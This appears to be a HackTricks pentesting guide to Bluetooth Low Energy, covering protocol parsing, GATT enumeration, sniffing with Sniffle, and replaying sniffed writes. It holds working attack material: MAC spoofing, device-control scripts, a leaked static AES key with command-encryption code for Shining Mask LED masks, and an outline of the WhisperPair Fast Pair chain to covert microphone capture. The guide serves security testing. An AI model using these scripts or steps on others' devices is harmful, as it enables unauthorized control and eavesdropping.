Pentesting BLE - Bluetooth Low Energy

> [!TIP]
> Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> Support HackTricks

## Introduction

Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range from 2400 to 2483.5 MHz. Three of them (37, 38 and 39) are advertising channels; the remaining 37 carry connection data, which is why a sniffer has to follow the hop sequence to see a connection. Classic Bluetooth, by contrast, uses 79 channels in that same range.

BLE devices communicate by sending advertising packets (beacons); these packets broadcast the BLE device's existence to other nearby devices. Sometimes these beacons also carry data.

A listening device, also called a central device, can respond to an advertising packet with a SCAN request sent specifically to the advertising device. The response to that scan (SCAN_RSP) uses the same structure as the advertising packet and carries additional information that did not fit in the initial advertising packet, such as the full device name.

The preamble byte synchronizes the receiver's frequency and timing, while the four-byte access address is a connection identifier used in scenarios where multiple devices are trying to establish connections on the same channels (every advertising-channel packet uses the fixed access address 0x8E89BED6; each connection gets its own, chosen by the initiator in the CONNECT_IND). Next, the Protocol Data Unit (PDU) contains the advertising data. There are several PDU types; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the ADV_NONCONN_IND PDU type if they do not accept connections and only transmit data in the advertising packet. Devices use ADV_IND if they allow connections, and they stop sending advertising packets once a connection has been established.
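The advertising PDU layout above, decoded in Python as an added example that is not code from the original page or from any vendor tool. The field layouts (2-byte link-layer header with the PDU type in the low nibble and TxAdd in bit 6, a little-endian AdvA, then length/type/value AD structures) are from the Bluetooth Core specification; the two sample packets are constructed by hand, and the Fast Pair service data (UUID 0xFE2C, model ID) is included because the Fast Pair section later on this page scans advertisements for exactly that.

```python
"""Decode a BLE advertising-channel PDU (header, AdvA, AD structures).

Added example for this page. Layouts follow the Bluetooth Core spec; the sample
PDUs at the bottom are constructed by hand so the script runs offline.
"""
import struct

PDU_TYPES = {
    0x0: "ADV_IND",          # connectable, scannable, undirected
    0x1: "ADV_DIRECT_IND",   # connectable, directed at one initiator
    0x2: "ADV_NONCONN_IND",  # not connectable: data only lives in the advertisement
    0x3: "SCAN_REQ",
    0x4: "SCAN_RSP",
    0x5: "CONNECT_IND",
    0x6: "ADV_SCAN_IND",     # scannable but not connectable
}
AD_TYPES = {0x01: "Flags", 0x02: "Incomplete16bitUUIDs", 0x03: "Complete16bitUUIDs",
            0x08: "ShortenedName", 0x09: "CompleteName", 0x16: "ServiceData16",
            0xFF: "ManufacturerData"}
ADV_ACCESS_ADDRESS = 0x8E89BED6   # fixed access address of every advertising-channel packet
FAST_PAIR_UUID = 0xFE2C


def decode_ad(ad_type, value):
    """Decode one AD structure into (name, decoded value)."""
    name = AD_TYPES.get(ad_type, f"AD0x{ad_type:02X}")
    if ad_type == 0x01:
        return name, value[0]
    if ad_type in (0x02, 0x03):   # list of little-endian 16-bit UUIDs
        return name, [struct.unpack_from("<H", value, o)[0] for o in range(0, len(value) - 1, 2)]
    if ad_type in (0x08, 0x09):
        return name, value.decode("utf-8", "replace")
    if ad_type == 0x16:           # 16-bit service UUID followed by service-specific data
        return name, (struct.unpack_from("<H", value)[0], bytes(value[2:]))
    return name, bytes(value)


def parse_ad_structures(data):
    """Walk AdvData / ScanRspData. Length counts the AD type byte; a 0 length ends the list."""
    out, i = [], 0
    while i < len(data):
        length = data[i]
        if length == 0:
            break
        if i + 1 + length > len(data):
            raise ValueError("truncated AD structure")
        out.append(decode_ad(data[i + 1], data[i + 2:i + 1 + length]))
        i += 1 + length
    return out


def parse_adv_pdu(pdu):
    """Parse the LL advertising PDU (preamble, access address and CRC already stripped)."""
    if len(pdu) < 2:
        raise ValueError("PDU too short")
    header, length = pdu[0], pdu[1]
    pdu_type = header & 0x0F
    payload = pdu[2:2 + length]
    if len(payload) != length:
        raise ValueError("length byte exceeds PDU")
    info = {"type": PDU_TYPES.get(pdu_type, f"0x{pdu_type:X}"),
            "random_addr": bool(header & 0x40),   # TxAdd bit: 1 = random address
            "connectable": pdu_type in (0x0, 0x1),
            "scannable": pdu_type in (0x0, 0x6)}
    if pdu_type in (0x0, 0x2, 0x4, 0x6):
        if len(payload) < 6:
            raise ValueError("missing AdvA")
        info["adv_a"] = ":".join(f"{b:02X}" for b in payload[5::-1])  # on-air order is little-endian
        info["ad"] = parse_ad_structures(payload[6:])
    else:
        info["raw"] = bytes(payload)
    return info


def is_fast_pair(info):
    """True if the advertisement carries the Google Fast Pair service (0xFE2C)."""
    for name, value in info.get("ad", []):
        if name == "ServiceData16" and value[0] == FAST_PAIR_UUID:
            return True
        if name in ("Incomplete16bitUUIDs", "Complete16bitUUIDs") and FAST_PAIR_UUID in value:
            return True
    return False


def build_adv_pdu(pdu_type, adv_a, ad_structs, random_addr=False):
    """Inverse of parse_adv_pdu; used here only to construct the sample packets."""
    addr = bytes.fromhex(adv_a.replace(":", ""))[::-1]
    adv_data = b"".join(bytes([len(v) + 1, t]) + v for t, v in ad_structs)
    header = pdu_type | (0x40 if random_addr else 0)
    return bytes([header, 6 + len(adv_data)]) + addr + adv_data


# Constructed samples: a connectable device advertising a Fast Pair model ID, and a beacon-only one
SAMPLE_ADV_IND = build_adv_pdu(0x0, "A4:CF:12:6C:B3:76",
                               [(0x01, b"\x06"), (0x09, b"Mask"),
                                (0x16, struct.pack("<H", FAST_PAIR_UUID) + b"\x01\x02\x03")])
SAMPLE_NONCONN = build_adv_pdu(0x2, "C0:11:22:33:44:55", [(0xFF, b"\x4C\x00\x02\x15")],
                               random_addr=True)
```

`parse_adv_pdu` is deliberately strict: a length byte that overruns the PDU or an AD structure that overruns AdvData raises instead of silently truncating, since malformed advertisements are exactly what you will meet when fuzzing a scanner.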

## GATT

The Generic Attribute Profile (GATT) defines how a device should format and transfer data. When you analyze the attack surface of a BLE device, you will usually concentrate on the GATT (or GATTs), because it is how device functionality gets triggered and how data gets stored, grouped, and modified. GATT lists a device's services, characteristics, and descriptors as a table of attributes, each addressed by a 16-bit handle and identified by a UUID (16-bit for Bluetooth SIG-assigned ones such as 0x2A00 Device Name, 128-bit for vendor-specific ones). A characteristic is a data value sent between the central device and the peripheral; its declaration carries a property bitmask that says whether it can be read, written (with or without response), notified or indicated. Characteristics can have descriptors that provide additional information about them, and they are grouped into services when they relate to performing a particular action.

## Enumeration

```bash
hciconfig #Check config, check if UP or DOWN (hciconfig is deprecated in recent BlueZ; bluetoothctl/btmgmt are the replacements)
# If DOWN try:
sudo modprobe bluetooth   # note: "modprobe -c" only prints the module config, it does not load anything
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```

### GATTool

GATTTool allows you to establish a connection with another device, list that device's characteristics, and read and write its attributes.
GATTTool can start an interactive shell with the -I option:

<details>

<summary>GATTTool interactive usage and examples</summary>

```bash
gatttool -i hci0 -I
[                 ][LE]> connect A4:CF:12:6C:B3:76
Attempting to connect to A4:CF:12:6C:B3:76
Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
```

Write data:

```bash
gatttool -i <hci iface> -b <device MAC> --char-write-req -a <value handle> -n <hex value>
# Note: "xxd -ps" hex-encodes the ASCII string, so this writes the 20 ASCII bytes of "04dc54d9053b4307680a".
# To write the raw bytes 04 dc 54 ... pass the hex directly: -n 04dc54d9053b4307680a
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
```

Read data:

```bash
gatttool -i <hci iface> -b <device MAC> --char-read -a 0x16
```

Read over an authenticated, encrypted connection (forces pairing/encryption before the read, which is a quick way to check whether a characteristic that fails with "Insufficient authentication" becomes readable once the link is secured):

```bash
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```

</details>
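To turn a `characteristics` listing like the one above into an attack-surface map, the following added example (not code from the page or from BlueZ) parses gatttool's output, decodes the property bitmask from each characteristic declaration, expands Bluetooth-base 16-bit UUIDs to their SIG number, and separates writable characteristics from those that only expose state. The first two sample lines are the ones shown above; the third is a constructed vendor-specific characteristic.

```python
"""Triage gatttool 'characteristics' output: decode property flags, spot the attack surface.

Added example for this page. Property bits and the Bluetooth base UUID are from the
Core spec; the third sample line is constructed.
"""
import re

# Characteristic property bits from the characteristic declaration (Core spec Vol 3 Part G)
PROPERTY_BITS = {
    0x01: "broadcast", 0x02: "read", 0x04: "write-without-response", 0x08: "write",
    0x10: "notify", 0x20: "indicate", 0x40: "authenticated-signed-writes",
    0x80: "extended-properties",
}
BASE_UUID_RE = re.compile(r"^0000([0-9a-f]{4})-0000-1000-8000-00805f9b34fb$")
SIG_NAMES = {0x2A00: "Device Name", 0x2A05: "Service Changed", 0x2A06: "Alert Level"}
LINE_RE = re.compile(
    r"handle: (0x[0-9a-fA-F]{4}), char properties: (0x[0-9a-fA-F]{2}), "
    r"char value handle: (0x[0-9a-fA-F]{4}), uuid: ([0-9a-fA-F-]{36})")


def decode_properties(mask):
    """Expand the property byte into names, lowest bit first."""
    return [name for bit, name in sorted(PROPERTY_BITS.items()) if mask & bit]


def describe_uuid(uuid):
    """('sig', 0x2A00, 'Device Name') for base-UUID characteristics, else ('vendor', None, uuid)."""
    m = BASE_UUID_RE.match(uuid.lower())
    if m:
        short = int(m.group(1), 16)
        return "sig", short, SIG_NAMES.get(short, f"0x{short:04X}")
    return "vendor", None, uuid.lower()


def parse_characteristics(text):
    """Parse every 'handle: ..., char properties: ...' line gatttool prints."""
    chars = []
    for m in LINE_RE.finditer(text):
        decl, props, value_handle, uuid = m.groups()
        kind, _short, label = describe_uuid(uuid)
        chars.append({"handle": int(decl, 16), "value_handle": int(value_handle, 16),
                      "properties": decode_properties(int(props, 16)),
                      "kind": kind, "label": label, "uuid": uuid.lower()})
    return chars


def triage(chars):
    """Split into what a client can push to (writes) and what leaks state (reads/notifications).

    Note: the property bits say what the peripheral advertises, not what it enforces; a
    write that is accepted without pairing is only confirmed by actually performing it."""
    writable = [c for c in chars if {"write", "write-without-response"} & set(c["properties"])]
    observable = [c for c in chars if {"read", "notify", "indicate"} & set(c["properties"])]
    return writable, observable


# Two lines from the gatttool session above plus one constructed vendor characteristic
SAMPLE_OUTPUT = """\
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
handle: 0x002d, char properties: 0x0c, char value handle: 0x002e, uuid: d44bc439-abfd-45a2-b575-925416129600
"""
```

The value handle, not the declaration handle, is what you pass to `--char-write-req -a` / `--char-read -a`; mixing the two is the most common reason a write "succeeds" in gatttool but does nothing on the device.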

### Bettercap

```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

## Sniffing and taking control of unpaired BLE devices

Many cheap BLE peripherals never implement pairing/bonding. Without bonding, link-layer encryption is never enabled, so ATT/GATT traffic is cleartext. A passive (off-path) sniffer can follow the connection, decode the GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to drive the device.

### Sniffing with Sniffle (CC26x2/CC1352)

Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) reflashed with NCC Group's Sniffle firmware.

Install Sniffle and its Wireshark extcap on Linux:

<details>

<summary>Install Sniffle extcap (Linux)</summary>

```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
  echo "[+] - Sniffle not installed! Installing at 1.10.0..."
  sudo mkdir -p /opt/sniffle
  sudo chown -R $USER:$USER /opt/sniffle
  pushd /opt/sniffle
  wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
  tar xvf v1.10.0.tar.gz
  # Install Wireshark extcap for user and root only
  mkdir -p $HOME/.local/lib/wireshark/extcap
  ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
  sudo mkdir -p /root/.local/lib/wireshark/extcap
  sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
  popd
else
  echo "[+] - Sniffle already installed at 1.10.0"
fi
```

</details>

Flash the Sonoff with the Sniffle firmware (make sure the serial device matches yours, e.g. /dev/ttyUSB0):

```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
# -e erase, -w write, -v verify; the --bootloader-sonoff-usb switch drives the dongle into its bootloader over USB
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```

Capture in Wireshark through the Sniffle extcap and pivot quickly to state-changing writes with the display filter:

```
_ws.col.info contains "Sent Write Command"
```

This shows the ATT Write Commands sent by the client (writes with response appear as "Sent Write Request" in the same column, so check both); handle and value often map directly to device actions (e.g. write 0x01 to a buzzer/alert characteristic, 0x00 to stop it).
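The same triage done programmatically over the raw packets, as an added example that is not code from Sniffle, Wireshark or the original page. It carves ATT PDUs out of link-layer data PDUs (LL header, L2CAP header with CID 0x0004, then ATT opcode/handle/value), collects the values the client wrote per handle and what the device notified, and renders each write as the gatttool command that replays it, distinguishing Write Command (`--char-write`, no response) from Write Request (`--char-write-req`). The capture is constructed inline; with a real Sniffle pcap you would feed it the decoded LL data PDUs.

```python
"""Carve ATT operations out of sniffed BLE data PDUs and build a replay inventory.

Added example for this page. Layout handled: LL data PDU header (2 bytes, LLID in the
low 2 bits of byte 0) -> L2CAP B-frame header (length, CID) -> ATT PDU. The sample
capture is constructed by hand so the script runs offline.
"""
import struct
from collections import defaultdict

ATT_CID = 0x0004
ATT_READ_REQ, ATT_READ_RSP = 0x0A, 0x0B
ATT_WRITE_REQ, ATT_WRITE_RSP = 0x12, 0x13
ATT_WRITE_CMD = 0x52              # Write Command: no response; what "Sent Write Command" matches
ATT_HANDLE_VALUE_NTF = 0x1B
HANDLE_OPCODES = {ATT_READ_REQ, ATT_WRITE_REQ, ATT_WRITE_CMD, ATT_HANDLE_VALUE_NTF}


def parse_ll_data_pdu(pdu):
    """Return (opcode, handle, value) for an ATT PDU carried in an LL data PDU, else None."""
    if len(pdu) < 2 + 4:
        return None
    llid = pdu[0] & 0x03
    if llid != 0x02:              # 0b10 = start of an L2CAP message; 0b01 continuation, 0b11 LL control
        return None
    l2len, cid = struct.unpack_from("<HH", pdu, 2)
    if cid != ATT_CID:
        return None
    att = pdu[6:6 + l2len]
    if len(att) < 1:
        return None
    opcode = att[0]
    if opcode in HANDLE_OPCODES:
        if len(att) < 3:
            return None
        return opcode, struct.unpack_from("<H", att, 1)[0], bytes(att[3:])
    return opcode, None, bytes(att[1:])


def replay_inventory(pdus):
    """handle -> [(opcode, value), ...] for client writes; handle -> [value, ...] for notifications."""
    writes, notifies = defaultdict(list), defaultdict(list)
    for pdu in pdus:
        parsed = parse_ll_data_pdu(pdu)
        if parsed is None:
            continue
        opcode, handle, value = parsed
        if opcode in (ATT_WRITE_REQ, ATT_WRITE_CMD):
            writes[handle].append((opcode, value))
        elif opcode == ATT_HANDLE_VALUE_NTF:
            notifies[handle].append(value)
    return dict(writes), dict(notifies)


def gatttool_replay(writes, mac):
    """Render each sniffed write as the gatttool command that replays it, in handle order."""
    lines = []
    for handle, entries in sorted(writes.items()):
        for opcode, value in entries:
            flag = "--char-write" if opcode == ATT_WRITE_CMD else "--char-write-req"
            lines.append(f"gatttool -b {mac} {flag} -a 0x{handle:04x} -n {value.hex()}")
    return lines


def build_ll_att(opcode, handle, value=b""):
    """Wrap an ATT PDU in L2CAP + LL headers; used only to construct the sample capture."""
    att = bytes([opcode]) + struct.pack("<H", handle) + value
    l2cap = struct.pack("<HH", len(att), ATT_CID) + att
    return bytes([0x02, len(l2cap)]) + l2cap          # LLID=0b10, then LL payload length


# Constructed sample: client switches an alert-style characteristic on, device notifies, client switches it off
SAMPLE_CAPTURE = [
    build_ll_att(ATT_WRITE_CMD, 0x000B, b"\x01"),
    build_ll_att(ATT_HANDLE_VALUE_NTF, 0x000E, b"\x01\x00"),
    build_ll_att(ATT_READ_REQ, 0x0016),
    build_ll_att(ATT_WRITE_REQ, 0x002E, bytes.fromhex("04dc54d9")),
    bytes([0x03, 0x02, 0x05, 0x01]),                  # LL control PDU (LLID=0b11): ignored
    build_ll_att(ATT_WRITE_CMD, 0x000B, b"\x00"),
]
```

Order matters for replay: the inventory keeps writes per handle in capture order, because many devices expect a sequence (start, then stop; or a handshake command before bulk data) rather than a single value.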

Quick Sniffle CLI examples (both scripts live in `python_cli/`; the live receiver is `sniff_receiver.py`, the advertisement scanner is `scanner.py`):

```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniff_receiver.py --string "banana" --output sniff.pcap
```

Alternative sniffer: Nordic's nRF Sniffer for BLE plus its Wireshark plugin also works. On the small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so either you keep a dedicated sniffer dongle or you need a J-Link/JTAG to restore the bootloader later.

### Active control via GATT

Once you have identified a writable characteristic handle and value from the sniffed traffic, connect as any central and perform the same write:

- Using Nordic nRF Connect for Desktop (BLE app):
  - Select the nRF52/nRF52840 dongle, scan and connect to the target.
  - Browse the GATT database and find the target characteristic (it often has a friendly name, e.g. Alert Level).
  - Perform a Write with the sniffed bytes (e.g. 01 to start, 00 to stop).
- Automate on Windows with a Nordic dongle using Python + blatann:

<details>

<summary>Python blatann write example (Windows + Nordic dongle)</summary>

```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"                 # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"   # Replace with your target MAC
TARGET_HANDLE = 0x000b             # Replace with the handle seen in the sniffed write

# ",p" marks the address as public (",r" for a random address)
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
    print("[!] Connection failed.")
    ble_device.close()
    raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
    for ch in service.characteristics:
        if ch.handle == TARGET_HANDLE:
            print("[!] Beeping.")
            ch.write(b"\x01")
            time.sleep(2)
            print("[+] And relax.")
            ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```

</details>

### Case study: taking control of a BLE LED mask (Shining Mask family)

Cheap, white-label BLE LED masks driven by the "Shining Mask" app accept write control from any nearby central without pairing/bonding. The app uses GATT to talk to a command characteristic and a data characteristic; commands are encrypted with AES-ECB under a static key embedded in the app, while the bulk image data is sent unencrypted.

Key UUIDs on these devices:
- Command write characteristic: d44bc439-abfd-45a2-b575-925416129600
- Notify characteristic: d44bc439-abfd-45a2-b575-925416129601
- Image data characteristic: d44bc439-abfd-45a2-b575-92541612960a

Unauthenticated GATT writes
- No pairing/bonding is required. Any host can connect and write to the command UUID to change brightness, select images, trigger animations, etc.
- Typical operations observed: LIGHT (brightness), IMAG (select index), DELE (delete indices), SPEED, ANIM, PLAY, CHEC (query count), DATS (begin upload).

Static-key AES command framing
- Frame = 1-byte length, ASCII op (e.g. b"LIGHT"), args, zero-padded to 16 bytes, AES-ECB encrypted with the static key from the app.
- Known static key (hex): 32672f7974ad43451d9c6c894a0e8764
- This is obfuscation, not authentication: the key is the same in every app install, ECB with no nonce or counter means the same command always encrypts to the same bytes, so a captured frame can be replayed verbatim even without the key.

Python helper to encrypt a command (example: set max brightness); the resulting ciphertext is then written to the command characteristic with whatever transport you use (bettercap `ble.write`, gatttool, blatann):
```python
from Crypto.Cipher import AES        # pip install pycryptodome
from binascii import unhexlify

KEY = unhexlify('32672f7974ad43451d9c6c894a0e8764')   # static key extracted from the app

def enc_cmd(op, args=b''):
    # Frame: [len(op)+len(args)] [ASCII op] [args], zero-padded to the 16-byte AES block size
    body = bytes([len(op) + len(args)]) + op.encode() + args
    body += b'\x00' * ((16 - (len(body) % 16)) % 16)
    # AES-ECB under a static key: deterministic, so identical commands produce identical ciphertext
    return AES.new(KEY, AES.MODE_ECB).encrypt(body)

packet = enc_cmd('LIGHT', b'\xff')
# Write 'packet' to d44bc439-abfd-45a2-b575-925416129600
```

Image upload flow

- After the encrypted DATS handshake, raw chunks are written unencrypted to the data characteristic …960a.
- Packet framing: [len][seq][payload]. Empirically, roughly ~100 bytes of payload per packet works reliably.
<details>

<summary>Minimal image-upload pseudocode</summary>

```python
# Uses enc_cmd() from the helper above. write_cmd_char / write_data_char are transport callbacks
# that write bytes to ...9600 and ...960a respectively (gatttool, bettercap, blatann, ...).
def upload_image(img_bytes, write_cmd_char, write_data_char, img_index=b'\x01\x00', chunk=98):
    # Start upload (encrypted): two bytes size, two bytes index, one toggle byte
    img_size = len(img_bytes).to_bytes(2, 'big')
    start = enc_cmd('DATS', img_size + img_index + b'\x01')   # img_index b'\x01\x00' = index 1
    write_cmd_char(start)                                       # expect DATSOK on the notify char

    # Stream raw chunks (unencrypted) to ...960a: [len][seq][payload]
    seq = 0
    for off in range(0, len(img_bytes), chunk):   # 98 data bytes per packet (~100 total incl. len+seq)
        piece = img_bytes[off:off + chunk]
        pkt = bytes([len(piece) + 1, seq & 0xff]) + piece   # the len byte also counts the seq byte
        write_data_char(pkt)
        seq += 1

    # Optionally signal completion if the firmware expects it (e.g. DATCP)
```

</details>

### Fast Pair (0xFE2C) Key-Based Pairing signature bypass (WhisperPair/CVE-2025-36911)

- **Recon:** Scan BLE advertisements for **service UUID 0xFE2C** (Google Fast Pair). Devices in pairing mode typically show a pairing badge; even outside pairing mode the Fast Pair service may still answer over GATT.
- **Non-intrusive test (signature enforcement check):**
  1. GATT **connect** to the Fast Pair service and **read the Model ID**.
  2. **Write a Key-Based Pairing (KBP) value without a signature**. If the peripheral accepts the unsigned KBP write, it is vulnerable to the signature bypass (WhisperPair/CVE-2025-36911). A rejection indicates it is patched; the check may not behave as expected if the device is already paired.
- **BLE → BR/EDR pivot:** Send a **KBP Request** and parse the **encrypted response** to obtain the target's **BR/EDR address**. Use a classic bonding call (e.g. Android **`createBond(<BR/EDR address>)`**) to complete the unauthorized pairing. Where supported, writing an **Account Key** persists the relationship.
- **Microphone access after bonding:** Once bonded, open **HFP** and start **SCO audio** to obtain a live microphone stream to listen to or record (e.g. save as M4A). This chain turns acceptance of an unsigned KBP into remote audio capture without user consent.
- **Hunting/detection:** Look for Fast Pair GATT traffic immediately followed by classic **bonding attempts to the BR/EDR address returned in KBP**, and for **KBP writes** without a signature. Enforcing signature validation on KBP and showing a user-confirmed pairing prompt breaks the chain.

## Operational notes

- Use Sonoff+Sniffle on Linux for reliable channel hopping and connection following. Keep a spare Nordic sniffer as a backup.
- Without pairing/bonding, any nearby attacker can observe writes and replay or craft their own against unauthenticated writable characteristics; confirming that a fresh, unbonded central can reproduce a sniffed write is the proof of the finding.

## References

- [WPair — CVE-2025-36911 (WhisperPair) vulnerability scanner & research tool](https://github.com/zalexdev/wpair-app)
- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
- [Invasion of the Face Changers: Halloween Hijinks with Bluetooth LED Masks (Bishop Fox)](https://bishopfox.com/blog/invasion-of-the-face-changers-halloween-hijinks-with-bluetooth-led-masks)
- [Shining Mask BLE protocol notes (BrickCraftDream)](https://github.com/BrickCraftDream/Shining-Mask-stuff/blob/main/ble-protocol.md)
- [Android Bluetooth HCI snoop logging](https://source.android.com/docs/core/connect/bluetooth/verifying_debugging)
- [Adafruit Feather nRF52840 Express](https://www.adafruit.com/product/4062)
